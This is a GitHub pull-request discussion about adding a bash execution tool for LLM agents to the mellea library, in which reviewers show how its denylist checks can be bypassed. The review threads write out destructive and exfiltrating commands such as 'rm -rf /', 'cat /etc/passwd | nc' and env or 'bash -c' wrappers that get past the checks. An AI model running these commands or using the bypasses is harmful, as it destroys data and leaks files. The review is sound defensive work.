feat: add bash tool by akihikokuroda · Pull Request #1056 · generative-computing/mellea

akihikokuroda · 2026-05-11T00:21:56Z

Tool PR

Use this template when adding or modifying components in mellea/stdlib/tools/.

Description

Link to Issue: Part of Bash tool with capability-UX integration #1024

This PR adds bash tool. It has a fixed set configuration. The UX configuration will be in a separate PR.

Implementation Checklist

Protocol Compliance

Ensure compatibility with existing backends and providers
- For most tools being added as functions, this means that calling convert_function_to_tool works

Integration

Tool exported in mellea/stdlib/tools/__init__.py or, if you are adding a library of components, from your sub-module

Testing

Tests added to tests/stdlib/tools/
New code has 100% coverage
Ensure existing tests and github automation passes (a maintainer will kick off the github automation when the rest of the PR is populated)

Attribution

AI coding assistants used: claudecode

github-actions · 2026-05-11T00:22:23Z

The PR description has been updated. Please fill out the template for your PR to be reviewed.

planetf1

Thanks for the PR — the three-tier environment design (Static/Unsafe/LLMSandbox) follows code_interpreter cleanly, and reusing ExecutionResult is the right call.

Two security concerns need resolving before merge, plus a few smaller issues below.

UnsafeBashEnvironment validates argv but executes with shell=True

The safety checks parse the command with shlex.split() and inspect argv[0], then execute the original string with subprocess.run(command, shell=True, ...) (line 430). The shell processes the raw string, not the tokenised argv, so shell metacharacters bypass every check:

local_bash_executor("echo hi; rm -rf /")
# shlex.split → ['echo', 'hi;', 'sudo', 'rm', '-rf', '/']
# argv[0] = 'echo' — passes all checks
# shell runs: echo hi; rm -rf /   ← both commands execute

Same with redirects, pipes, and subshell substitution:

local_bash_executor("echo foo > /etc/passwd")             # redirect, not a write_command
local_bash_executor("echo $(id)")                         # subshell, not in argv
local_bash_executor("cat /etc/passwd | nc x.x.x.x 4444") # exfil

The fix is to execute argv with shell=False. That way what you check is exactly what runs.

bash -c "..." isn't blocked

bash, sh, zsh etc. are in DANGEROUS_COMMANDS but only blocked when -i/--interactive/-l/-login appears. bash -c "sudo rm -rf /" passes:

shlex.split('bash -c "sudo rm -rf /"') → ['bash', '-c', 'sudo rm -rf /']
any(arg in ('-i', '--interactive', '-l', '-login') for arg in argv)  # → False

Any LLM-generated command can dodge the whole denylist with a bash -c "..." wrapper. test_safe_shell_commands_allowed intentionally locks this in as expected behaviour, so it would need updating too.

If you go the shell=False route above, you'd also want to block -c (and script-file arguments) on shell interpreters.

Other things worth fixing in the same pass:

BashEnvironment.__init__ accepts allowed_paths and stores it on self, but nothing in any of the three environment classes reads self.allowed_paths. Callers who pass it expecting path enforcement get nothing. Either wire it into the checks or drop the parameter.

LLMSandboxBashEnvironment validates working_dir statically but doesn't pass it to SandboxSession (line 552 — no working_dir arg). The Docker container runs with its own default cwd. bash_executor(cmd, working_dir="/project") silently ignores the restriction.

except subprocess.TimeoutExpired at line 569 is inside the llm-sandbox session block. llm-sandbox isn't subprocess, so this handler likely never fires — timeouts fall through to except Exception with a generic message. The interpreter.py pattern just uses except Exception as e and that's cleaner here.

The parse/validate preamble (shlex.split → empty check → three validator calls) is copy-pasted into all three execute() methods verbatim. Once the security issues are fixed, extracting it to BashEnvironment._validate() would make future changes a one-place edit.

docs/examples/tools/shell_example.py line 1: # pytest: unit, qualitative → should be # pytest: e2e, qualitative. unit is auto-applied by conftest and shouldn't be written explicitly; this example runs real subprocesses so e2e is the right tier.

Three unused imports in shell.py: tempfile, dataclass, Any — ruff will flag these as F401.

planetf1 · 2026-05-11T18:31:36Z

The Docker sandbox path (LLMSandboxBashEnvironment) is the right approach for production use — container isolation is a real boundary. The concern is with UnsafeBashEnvironment and the safety checks around it.

The checks (lines 91–124) parse the command with shlex.split() to inspect argv[0] and flags, but execution at line 430 passes the raw string to /bin/sh -c via shell=True. The shell re-parses everything, including metacharacters that shlex.split never touches. All four of these pass every check:

```
echo hi && sudo cat /etc/shadow # argv[0] = "echo"
true; rm -rf /home # argv[0] = "true"
bash -c 'sudo id' # bash is in DANGEROUS_COMMANDS, but only -i/-l is blocked; -c is not
python3 -c "import os; os.system('rm -rf /')" # python3 is not in the denylist
```

The Python docs cover this in the subprocess security considerations: pre-processing a string before passing it to a shell does not make it safe. The shell is the parser that matters.

Two ways to fix this. Drop shell=True and pass shlex.split(command) as the args list — the denylist then governs what actually runs, at the cost of pipes, globs, and redirects. Or remove the denylist from UnsafeBashEnvironment, rename the public function (something like unsafe_local_bash_executor), and document that it is for trusted, developer-controlled use only. The Docker sandbox already handles the untrusted case.

what direction would you plan to take? it feels like an unsafe bash execution is rather unsafe (though many tools do offer something). I wonder if it should not be allowed by default, and we need to be very clear on any limitations/security impact.

planetf1 · 2026-05-11T20:19:54Z

Checking this against #1024 — the capability-UX integration (allow once / allow always, policy wiring through the harness) doesn't appear to be included. Intentional scope reduction, or planned as a follow-up?

ajbozarth

Some feedback from Claude. Also note Nigel's follow-up comment on UnsafeBashEnvironment still stands.

Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>

akihikokuroda · 2026-05-12T13:16:19Z

Checking this against #1024 — the capability-UX integration (allow once / allow always, policy wiring through the harness) doesn't appear to be included. Intentional scope reduction, or planned as a follow-up?Checking this against #1024 — the capability-UX integration (allow once / allow always, policy wiring through the harness) doesn't appear to be included. Intentional scope reduction, or planned as a follow-up?

I'll address it as a follow-up.

Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>

ajbozarth

All major concerns from the prior round are addressed. A few non-blocking follow-ups inline.

Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>

planetf1 · 2026-05-13T07:22:40Z

LGTM from my side once Angelo's inline comments are addressed. Thanks for filing the follow-up issues too.

Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>

ajbozarth · 2026-05-13T14:49:54Z

Updates look good, but I still don't get a successful result in the llm example:

=== Example 3: LLM-Generated Bash Commands with Forced Tool Use ===
  0%|                                                                                                                                                                                                                    | 0/2 [00:00<?, ?it/s]=== 09:46:59-INFO ======
Tools for call: dict_keys(['bash_executor'])
=== 09:46:59-INFO ======
SUCCESS
  0%|                                                                                                                                                                                                                    | 0/2 [00:00<?, ?it/s]
LLM generated bash command:
  find . -type f -iname '*.py'

Execution result:
  Success: False
  Skipped: True
  Skip reason: Sandbox execution error: Error while fetching server API version: ('Connection aborted.', FileNotFoundError(2, 'No such file or directory'))
  Output: None

for comparison, before the last commit this was the result:

=== Example 3: LLM-Generated Bash Commands with Forced Tool Use ===
  0%|                                                                                             | 0/2 [00:00<?, ?it/s]=== 20:44:24-INFO ======
Tools for call: dict_keys(['unsafe_local_bash_executor'])
=== 20:44:24-INFO ======
SUCCESS
  0%|                                                                                             | 0/2 [00:00<?, ?it/s]
LLM generated bash command:
  ls *.py

=== 20:44:24-WARNING ======
Using unsafe_local_bash_executor: no isolation. Use bash_executor() for LLM-generated code.
Execution result:
  Success: False
  Skipped: False
  Output: 
  Error: ls: *.py: No such file or directory

akihikokuroda · 2026-05-13T15:38:08Z

Here is my case. LLM generates command with "find". it doesn't find any file anyway but it doesn't say "error". :-)

I don't think that this example is very good but enough.

=== 11:32:24-WARNING ======
Using unsafe_local_bash_executor: no isolation. Use bash_executor() for LLM-generated code.
Tool invocation result:
  Success: True
  Output: /Users/akihikokuroda/development/repositories/generative-computing/mellea

=== 11:32:24-INFO ======
Starting Mellea session: backend=ollama, model=granite4.1:3b, context=SimpleContext
=== Example 3: LLM-Generated Bash Commands with Forced Tool Use ===
  0%|                                                                                                                            | 0/2 [00:00<?, ?it/s]=== 11:32:24-INFO ======
Tools for call: dict_keys(['bash_executor'])
=== 11:32:26-INFO ======
SUCCESS
  0%|                                                                                                                            | 0/2 [00:01<?, ?it/s]
LLM generated bash command:
  find . -name "*.py"

Execution result:
  Success: True
  Skipped: False
  Output: ./04c43b39e616410d828490aa31e4f20d.py

=== Example 3: Working Directory Restriction ===
Working directory: /var/folders/kl/cljphvzd64qgtl2sqnh30fs00000gn/T/tmpey3c8_6o
=== 11:32:43-WARNING ======
Using unsafe_local_bash_executor: no isolation. Use bash_executor() for LLM-generated code.
Command: touch myfile.txt (relative path, executed in /var/folders/kl/cljphvzd64qgtl2sqnh30fs00000gn/T/tmpey3c8_6o)
Success: True

✓ File created at: /var/folders/kl/cljphvzd64qgtl2sqnh30fs00000gn/T/tmpey3c8_6o/myfile.txt

=== 11:32:43-WARNING ======
Using unsafe_local_bash_executor: no isolation. Use bash_executor() for LLM-generated code.
Command: cat myfile.txt
Output:

ajbozarth

FYI the example failed for me until I set DOCKER_HOST. The Python docker SDK (used by llm-sandbox) doesn't read Docker CLI contexts and defaults to /var/run/docker.sock. That works on Docker Desktop (which symlinks the socket there) but not on colima, podman, or rootless setups, where users hit a cryptic FileNotFoundError(2, 'No such file or directory') with no pointer to the real fix.

Not blocking, but might be worth a note in the example docstring or a clearer skip-reason.

akihikokuroda · 2026-05-13T16:20:51Z

FYI the example failed for me until I set DOCKER_HOST. The Python docker SDK (used by llm-sandbox) doesn't read Docker CLI contexts and defaults to /var/run/docker.sock. That works on Docker Desktop (which symlinks the socket there) but not on colima, podman, or rootless setups, where users hit a cryptic FileNotFoundError(2, 'No such file or directory') with no pointer to the real fix.

Not blocking, but might be worth a note in the example docstring or a clearer skip-reason.

@ajbozarth It seems out of scope for this example commenting about docker setup.

akihikokuroda · 2026-05-13T16:22:19Z

@planetf1 Would you approve this?

planetf1

Thanks for the PR, Aki! The shlex.split/shell=False foundation is the right approach, and the environment abstraction is clean. I do have three security findings that need addressing before merge, plus a few correctness issues.

BLOCKERs (must fix before merge)

env-chain bypass: env -i sudo whoami and env rm -rf /tmp/test both pass through the denylist
_check_working_dir_restriction is fail-open: an unresolvable working_dir silently grants access to all paths
/private/var in DANGEROUS_PATHS blocks Python's standard temp directories on macOS

Warnings

Shell operator substring check produces false positives (grep a&&b file.txt is blocked)
Several normal operations are incorrectly blocked: git config -f, git clean --dry-run, cp -r, make -f
Double truncation marker in _LocalBashEnvironment.execute()
repr() in the sandbox Python wrapper breaks if any argv element is a Path object

Suggestion

Truncation test oracle is always true and doesn't actually validate truncation

Details in the inline comments.

planetf1 · 2026-05-14T11:47:53Z

+        # Skip if this argument is the value for a preceding flag (space-separated)
+        # E.g., in "timeout -t 10 sudo", skip "10" (it's the value for -t)
+        # But don't skip "sudo" when the flag uses = notation (e.g., --kill-after=1)
+        if i > 1 and argv[i - 1] in flag_value_flags:


BLOCKER — env-chain bypass

The flag_value_flags skip here has a security gap. -i is in the set, so in env -i sudo whoami the loop reaches sudo at index 2, sees that argv[1] is -i (a value-taking flag), and skips it — sudo never gets checked against DANGEROUS_COMMANDS.

Verified:

_is_dangerous_command(["env", "-i", "sudo", "whoami"]) # → (False, "")

A second path: rm isn't in DANGEROUS_COMMANDS at all (it's only caught when it's the top-level command), so env rm -rf /tmp/test also passes cleanly.

Suggested fixes:

Remove -i / --input from flag_value_flags — env(1)'s -i takes no value argument, so the skip is both wrong and dangerous here.

Add "rm" to DANGEROUS_COMMANDS so it's caught regardless of how it's invoked.

Consider an explicit allowlist of safe wrapper commands (e.g. timeout, nice, stdbuf) rather than implicitly permitting everything not in DANGEROUS_COMMANDS.

planetf1 · 2026-05-14T11:47:53Z

+            except Exception:
+                # If we can't resolve, skip (might be a flag value)
+                pass
+    except Exception:


BLOCKER — fail-open in _check_working_dir_restriction

The outer except Exception: pass swallows any error that occurs while resolving working_dir itself and then falls through to return False, "" (line 384) — which means "no restriction violation found". So if working_dir is a non-existent or otherwise unresolvable path, all path checks are silently skipped and every write target is implicitly allowed.

The inner except Exception: pass (line 378) has the same problem: if a single argument path can't be resolved, the check is skipped rather than denied.

For a security control, fail-closed is the right default:

Outer except: return (True, "Cannot validate paths: working_dir is not resolvable")

Inner except: return (True, f"Cannot validate path '{arg}'") — or at minimum log a warning and continue rather than silently skipping.

planetf1 · 2026-05-14T11:47:53Z

+    "/var/www",
+    # macOS /private equivalents
+    "/private/etc",
+    "/private/var",


BLOCKER — macOS temp directories blocked by /private/var

"/private/var" in DANGEROUS_PATHS is too broad for macOS. On macOS, Path.resolve() rewrites /var/folders/… (the normal location returned by tempfile.mkdtemp()) to /private/var/folders/…, which matches this prefix and triggers the system-path block.

Verified on macOS with a fresh tempfile.TemporaryDirectory():

env = _LocalBashEnvironment(working_dir=tmpdir) env.execute("touch test.txt") # → skipped=True, "write to a dangerous system path"

The specific paths that need protecting under /private/var are log directories, web roots, and system databases — not the whole tree. Suggest replacing "/private/var" with narrower entries:

"/private/var/log", "/private/var/www", "/private/var/db", "/private/var/root",

planetf1 · 2026-05-14T11:47:53Z

+        if arg in shell_operators:
+            return True, f"Shell operator '{arg}' is not allowed"
+        # Check for combined operators or operators within tokens
+        if any(op in arg for op in shell_operator_sequences):


Warning — shell operator substring false positive

The any(op in arg ...) check does substring matching, so a legitimate grep pattern like a&&b gets blocked even though && is part of the argument value, not a shell operator. The preceding block (line 106) already correctly handles standalone && tokens via arg in shell_operators.

_is_dangerous_command(["grep", "a&&b", "file.txt"]) # → (True, "Shell operator is not allowed") ← false positive

Since shlex.split with shell=False is already preventing shell expansion, the standalone token check on line 106 is the right level of defence here. The sequence check on line 109 could be removed or restricted to cases where the operator is at a word boundary.

planetf1 · 2026-05-14T11:47:53Z

+    # Check for dangerous git operations
+    if cmd == "git":
+        # Check for --force flag on any git operation
+        if any("--force" in arg or arg == "-f" for arg in argv):


Warning — git -f / --force false positives (and a few others)

A handful of false positives here worth fixing:

Line 203 — any("--force" in arg or arg == "-f" for arg in argv) uses substring matching for --force and exact match for -f. git config -f myconfig is a routine read-only operation (-f means "use this config file"), but it's blocked.

Line 211 — any(("-f" in arg or "-d" in arg) for arg in argv) uses substring matching. -d is a substring of --dry-run, so git clean --dry-run (a safe, read-only check) is blocked. Should use exact token matching (arg == "-f" or arg == "-d").

Lines 222–225 — DANGEROUS_FLAGS includes -r and --recursive, and this block fires for cp, mv, and make. cp -r src dst and make -f Makefile target are completely standard operations.

All verified:

_is_dangerous_command(["git", "config", "-f", "myconfig"]) # blocked _is_dangerous_command(["git", "clean", "--dry-run"]) # blocked _is_dangerous_command(["cp", "-r", "src", "dst"]) # blocked _is_dangerous_command(["make", "-f", "Makefile", "target"]) # blocked

planetf1 · 2026-05-14T11:47:53Z

+            stderr, stderr_truncated = _truncate_output(result.stderr.strip())
+
+            # Append truncation warnings if needed
+            if stdout_truncated:


Warning — double truncation marker

_truncate_output already appends "\n[OUTPUT TRUNCATED]" to the string it returns (see its implementation). The caller here then checks the truncated bool and appends a second message "\n[Output truncated - stdout exceeded 10KB]", so both appear in the output.

Pick one: either have _truncate_output embed the message (and drop the caller-side append), or return a clean string + bool and let the caller do the formatting — but not both.

planetf1 · 2026-05-14T11:47:53Z

+        python_wrapper = (
+            "import subprocess\n"
+            "import sys\n"
+            f"result = subprocess.run({argv!r}, shell=False, cwd={sandbox_workdir!r}, "


Warning — repr() in sandbox Python wrapper is fragile

{argv!r} embeds the argv list as Python source. If any element is a Path object (plausible if a caller passes Path('/tmp/work') as a command argument), repr() produces PosixPath('/tmp/work'), which is a NameError when the generated script runs inside the sandbox.

Easiest fix — coerce to strings before embedding:

argv_strs = [str(a) for a in argv] python_wrapper = ( ... f"result = subprocess.run({argv_strs!r}, shell=False, ..." )

A more robust alternative is to pass the command via an environment variable or stdin rather than embedding it as source, which sidesteps the escaping problem entirely.

planetf1 · 2026-05-14T11:47:53Z

+            assert result.success is True
+            # Check that output was truncated
+            assert result.stdout is not None
+            assert "[OUTPUT TRUNCATED]" in result.stdout or len(result.stdout) < 30000


Suggestion — truncation test oracle is always true

The or len(result.stdout) < 30000 arm is always satisfied for ~10 KB of truncated output, so the assertion never actually validates that truncation happened. The test passes even if _truncate_output returns the full untruncated content.

assert "[OUTPUT TRUNCATED]" in result.stdout or len(result.stdout) < 30000 # ↑ always true for 10 KB output

Tighter oracle:

assert result.stdout is not None assert len(result.stdout) <= MAX_OUTPUT_SIZE + len("\n[OUTPUT TRUNCATED]") + 50 assert "[OUTPUT TRUNCATED]" in result.stdout

akihikokuroda requested a review from a team as a code owner May 11, 2026 00:21

akihikokuroda requested review from ajbozarth and planetf1 May 11, 2026 00:21

github-actions Bot added the enhancement New feature or request label May 11, 2026

planetf1 requested changes May 11, 2026

View reviewed changes

akihikokuroda force-pushed the shell branch from 4bd7263 to a1cabdc Compare May 11, 2026 16:17

akihikokuroda requested a review from planetf1 May 11, 2026 16:46

planetf1 reviewed May 11, 2026

View reviewed changes

Comment thread mellea/stdlib/tools/shell.py

ajbozarth requested changes May 11, 2026

View reviewed changes

akihikokuroda added 5 commits May 12, 2026 09:02

shell executor

fae04d2

Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>

shell executor

6b68540

Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>

update an example

a0ae263

Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>

review comments

de56311

Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>

review comments

b556d8f

Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>

review comments

e71cb54

Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>

akihikokuroda force-pushed the shell branch from 2c864dc to e71cb54 Compare May 12, 2026 14:49

akihikokuroda requested review from ajbozarth and planetf1 May 12, 2026 14:56

fix CI issue

aa295a3

Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>